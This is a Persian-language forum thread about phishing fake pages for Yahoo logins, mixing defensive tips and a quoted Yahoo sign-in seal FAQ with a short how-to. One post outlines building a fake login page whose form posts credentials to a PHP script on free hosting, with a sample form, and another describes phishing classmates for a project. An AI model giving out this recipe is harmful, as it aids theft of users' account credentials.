تا حالا ۲ بار یاهو آی دی مو از دست دادم که هر ۲ بارش هم مقصر خودم بودم...اما این دفعه آخر تمام کانتکت هام رو جای دیگه بک آپ گرفته بودم...زیاد مشکلی نبود..
سوالی که دارم اینه که کسی میدونه چجوری این صفحاتی که شبیهه صفحه لاگین شدن یاهو است رو استفاده میکنن؟؟
به این صورته که یه لینک به شما میدن که صفحه یاهوتون باز میشه..اما اینجا اونجا نیست..وقتی اطلاعاتتون رو وارد میکنید جای باز کردن ایمیل شما..اطلاعاتتون رو واسه اون فرد میفرسته..
کسی اطلاعی داره؟؟
من فقط میدونم به این صفحات میگن fake page و به این کار میگن phishing
فکر کنم تو نت سرچ کنید جواب سوالتون رو بگیرید.
مهمان عزیز شما قادر به مشاهده پیوندهای انجمن مانشت نمیباشید. جهت مشاهده پیوندها ثبت نام کنید.
بله درسته .
فیک پیج.
تقریبا یه شگرد قدیمی از شگردهای هک.
در این صورت یک صفحه شبیه به صفحه لاگین یاهو ساخته میشه و شما پس از لاگین کردن آیدی و پسورد رو به جای اینکه برای احراز هویت به سرور یاهو ارسال کنه به ایمیل طرف یا به فرمی که طرف درخواست میده ساب میت میشه.
بسیار هم ساده است.
تقریبا الان فیک پیج ها منسوخ شدن.
البته جدیدا فیک پیج های سایت و درگاه پرداخت زیاد شده.
تنها راه جلوگیری و حفاظت در قبال این نوع حمله ها هم اینه همیشه باید به آدرس که داریم اطلاعات رو وارد میکنم توجه کنیم.
وقتی می خواهید لاگین بشید به آدرس بار توجه کنید که آدرس یاهو باشه.
یه چیزه دیگه هم جدیدا واسه من پیش میاد که اگه آنتی فیلترت فعال باشه نمی تونی به مسنجر لاگین کنی(باید حتما غیرفعال باشه)...شاید واقعا از دستش نداده باشی !
(۱۶ تیر ۱۳۹۱ ۰۳:۱۴ ب.ظ)mthsh نوشته شده توسط: اگه آنتی فیلترت فعال باشه نمی تونی به مسنجر لاگین کنی(باید حتما غیرفعال باشه)
اگر IP پروکسی سرور رو تو مسنجرت وارد کنی میتونی همزمان با آنتی فیل*تر هم لاگین کنی
اصلا یه روزایی هست که همه مسنجرا غیر فعال میشن... فقط همینطوری میتونی لاگین کنی!
در مورد صفحات جعلی یا همون fake page ها باید بگم شما برای ساختن اونها نیاز به موارد زیر دارید:
۱- صفحه اصلی
۲- یکمی اطلاعات از php
۳- هاست رایگان php ساپورت
ببینید برای ساخت صفحه جعلی شما وارد صفحه لوگین یاهو میشین بعد اون رو ذخیره میکنید توی سیستم خودتون بعدش کد صفحه رو باز میکنید و دکمه sign in رو پیدا میکنید و کدش رو پاک میکنید و کد چند خطی که با php نوشتین رو جایگزین میکنید که این هم راحته اصلا اونجا میتونید یک فرم ارسال درخواست بسازین
<form method="post" action="www.x.com/get1.php">
<br>
<br>
<br><pre>
ID:<input type="text" name="id_text">
<pre>
Name:<input type="text" name="name_text">
 
<input type="submit">
</form>
البته این کد یکم نیاز به دستکاری به نسبت صفحه تقلبی ما داره
ما باید در get1.php که در یک هاست رایگان داریم اطلاعات ارسالی از این فرم که در صفحه یاهو جاسازی کردیم را با دو متغییر گرفته و ذخیره کنیم
در پایان خود این صفحه رو در فضا اپلود میکنیم و ادرسش رو برای قربانی ارسال میکنیم
حالا یک مشکل بزرگ داریم اونهم اینه که ما ادرس یاهوی ما مثلا شده
مهمان عزیز شما قادر به مشاهده پیوندهای انجمن مانشت نمیباشید. جهت مشاهده پیوندها ثبت نام کنید.
خوب یعنی طرف وقتی صفحه ما رو میبینه با نگاه به ادرس اون قضیه لو میره! چکار کنیم؟
برای این کار هم ما روش هایی داریم که من توضیح نمیدم برخی از اون روش ها بر میگرده به اسیب پذیری های مربوط به مرورگر ها و برخی هم استفاده از روش های ترکیبی برای اعتماد سازی قربانی و...
اما دیگه بسه. شلوغ نکنید!!!
من پروژه دوره کارشناسیم در مورد حملات phishing بود
یه fake page هم پیاده سازی کردم و برای بدست آوردن داده های آماری به کلی از دانشجو هامون حمله کردم!
پدر همه در اودم!!! مخصوصا اونایی که همیشه دم از امنیت و هکر بودن و این جور چیزا میزدن!!! وقتی قضیه رو گفتم قیافه هاشون دیدنی بود انصافا!
خب یعنی به جز چک کردن آدرس بار، چه چیزای دیگه ای رو باید چک کنیم تا مطمئن شیم؟
چرا راه های دیگه ای هم داره اما شما به همون ادرس که ۹۷% مطمئن هست اکتفا کن راه دیگه مثل چک کردن سورس صفحه و...
(۱۶ تیر ۱۳۹۱ ۰۴:۴۶ ب.ظ)MSZ نوشته شده توسط: یه fake page هم پیاده سازی کردم و برای بدست آوردن داده های آماری به کلی از دانشجو هامون حمله کردم!
میشه بیشتر توضیح بدین. چون من ارتباط بین فیک پیج و اطلاعات اماری رو نمیدونم...! چه ربطی داره؟َ
من برای پیاده سازی حمله فیشینگ، یه فیک پیج درست کردم
و افراد قربانی این فیک پیج رو با صفحه اصلی اشتباه گرفتن و پسوردشون رو لو دادن!
من چون برای پروژه و در راه آموزشی این کار رو کردم، می خواستم نشون بدم که چند درصد ملت تو دام افتادن و چند درصد پسر بودن و چند درصد دختر و .... . خلاصه برای بدست آوردن یک سری آمار ها این کار رو کردم. منظورم از آمار اینا بود
و اما در مورد روش شناسایی fake pageها، اینکه به URL نگاه کنین میتونه کمک کنه و خیلی هم مطمئن نیست. خیلی اوقات از روش های Cross-Site Scripting استفاده میشه که به این راحتی ها نمیشه تشخیصش داد.
من سعی میکنم گزارش کتبی که از تز پایانی ام تهیه کردم رو اینجا قرار بدم تا بیشتر با phishing و روشهای مقابله با اون آشنا بشین. ولی چون قراره تو یکی از کنفرانس های داخلی ارائه بشه، باید حتما از استادم اجازه بگیرم و البته صبر کنم تا مهلت نهایی submit کردن مقالات این کنفرانس تموم بشه. و حتما بعدش در اولین فرصت آپلودش میکنم
یک راه جلوگیری از فیشینگ از طریق تنظیمات خود یاهو :
Protect users on this computer against password theft with a sign-in seal.
یک عکس یا نوشته که قابل تشخیص برای خودتون باشه انتخاب میکنید و هر بار که صفحه لاگین یاهو میاد باید اون عکس کنارش باشه، اگر نبود میتونید شک کنید که صفحه فیک هست.
البته باز این روش هم از نظر من نمیتونه کاملا جلوگیری کنه چون اگر هکر از دوستانتون باشه و با سیستم شما کار کرده باشه ممکنه نوشته یا عکس رو از روی سیستم شما دیده باشه و فیک پیج رو همراه با اون نوشته یا عکس بفرسته.
یک نکته دیگه برای جلوگیری از هک شدن : فایرفاکس این باگ رو داره که پسوردهای که سیو میشه نشون میده پس حواستون باشه چون ممکنه شما مثلا توی سیستم یه نفر با یک اکانت دیگه لاگین بشید واستون مهم هم نیست که صاحب سیستم وارد اکانت شما بشه پس پسورد رو سیو میکنید اما چون اون شخص میتونه پسورد رو ببینه اگه پسورد بقیه اکانتهاتون هم همین باشه احتمال داره با پسورد شما وارد بشه.
What is phishing?
Phishing - a play on the word "fishing" - is an attempt to steal your password and private account info. Phishers can set up fake web sites that look like those of trusted companies like Yahoo! to trick you into disclosing your user name and password. To learn more about phishing, visit the Yahoo! Security Center.
How does a sign-in seal protect me?
A sign-in seal is a secret between the computer you set it up on and Yahoo!. So when you sign in to Yahoo! from this computer, your sign-in seal tells you that you're seeing a genuine Yahoo! site, not a phishing site.
Why do I have to set up a seal on each computer I use?
Your sign-in seal is associated with your computer, not your ID. It is a convenient way to instantly recognize a genuine Yahoo! sign-in page and be sure that you're not on a page created by fraudsters attempting to steal your Yahoo! ID and password. Because we associate your sign-in seal with your computer, after you create a seal, there are no additional steps to signing in. Even if a phisher knows or guesses your ID or other personal information, they cannot use it to discover your sign-in seal. Note: Yahoo! will never ask for your Yahoo! ID or password in order to set up or display your sign-in seal.
What if I share this computer with family or friends?
If they use Yahoo! too, you should show them the sign-in seal you're creating for this computer. Even better, create a sign-in seal together so that everyone will be happy to use and recognize the seal.
What about public computers?
Always use care when signing in on public computers, such as those located in libraries or Internet cafes. Administrators at these locations may create sign-in seals to help you identify Yahoo! on these machines, but you should not replace one of these seals with your own. It's best to rely on other methods to ensure you're signing in to a genuine Yahoo! site.
Will this sign-in seal protect me on sites other than Yahoo!?
No. The sign-in seal that you create here will only appear on Yahoo! sign-in screens. For more information about how to protect yourself online no matter where you are, see the Yahoo! Security Center.
What if I don't see my sign-in seal?
You could be on a fraudulent site, but there might be other reasons why you can't see it. For example, someone else who uses your computer may have deleted or changed your seal. The cookies or files that identify your seal may have also been deleted from your computer.